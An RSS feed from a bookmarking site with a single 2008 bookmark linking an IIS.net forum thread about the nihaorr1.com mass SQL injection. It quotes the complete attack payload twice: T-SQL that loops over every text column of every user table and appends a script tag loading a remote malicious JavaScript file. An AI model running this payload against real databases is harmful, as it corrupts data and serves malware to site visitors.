<?xml version="1.0" encoding="UTF-8"?>
<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns="http://purl.org/rss/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
<channel rdf:about="http://blogmarks.net/api/user/night.kame/marks/tag/sql server,microsoft">
<title>Public marks from user night.kame with tags &quot;sql server&quot; &amp; microsoft</title>
<description>Public marks from user night.kame with tags &quot;sql server&quot; &amp; microsoft</description>
<link>http://blogmarks.net/user/night.kame/marks/tag/sql server,microsoft</link>
<items><rdf:Seq><rdf:li resource="http://blogmarks.net/api/user/night.kame/mark/1057813783"/>
</rdf:Seq></items>
</channel>
<item rdf:about="http://blogmarks.net/api/user/night.kame/mark/1057813783">
<title>Anyone know about www.nihaorr1.com/1.js? - IIS.net </title>
<link>http://forums.iis.net/t/1148917.aspx?PageIndex=1</link>
<description>&lt;blockquote&gt;&lt;p&gt;DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=rtrim(convert(varchar'[' @C '])) ''&amp;lt;script src=nihaorr1.com/1.js&gt;&amp;lt;/script&gt;''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor&lt;/p&gt;&lt;/blockquote&gt;

Avec SQL Server, la vie est plus simple.</description>
<dc:date>2008-04-26T13:58:44Z</dc:date>
<dc:author>night.kame</dc:author>
<dc:subject>microsoft, ASP, sql server, injection SQL</dc:subject>
<content:encoded><![CDATA[<div class="mark">
<a href="http://forums.iis.net/t/1148917.aspx?PageIndex=1"><img border="0" src="http://blogmarks.net/screenshots/2008/04/26/1621841ff147732f842fb00b3b2e619f.jpg" alt="" /></a>
<div class="xfolkentry">
<h4><a class="taggedlink" href="http://forums.iis.net/t/1148917.aspx?PageIndex=1">Anyone know about www.nihaorr1.com/1.js? - IIS.net </a></h4>
 
by <a href="http://blogmarks.net/user/night.kame">night.kame</a> 
<div class="description"><blockquote><p>DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update [' @T '] set [' @C ']=rtrim(convert(varchar'[' @C '])) ''&lt;script src=nihaorr1.com/1.js>&lt;/script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor</p></blockquote>

Avec SQL Server, la vie est plus simple.</div>
<p class="tags">
<a rel="tag" class="tag public_tag" href="http://blogmarks.net/marks/tag/microsoft">microsoft</a>
<a rel="tag" class="tag public_tag" href="http://blogmarks.net/marks/tag/ASP">ASP</a>
<a rel="tag" class="tag public_tag" href="http://blogmarks.net/marks/tag/sql%2Bserver">sql server</a>
<a rel="tag" class="tag public_tag" href="http://blogmarks.net/marks/tag/injection%2BSQL">injection SQL</a>
</p>
<div class="action-bar">
<a href="http://blogmarks.net/my/marks,new?id=1057813783">Copy</a> | 
<a href="http://blogmarks.net/link/2759758">React (0)</a></div>
</div>
</div>
]]></content:encoded>
</item> </rdf:RDF>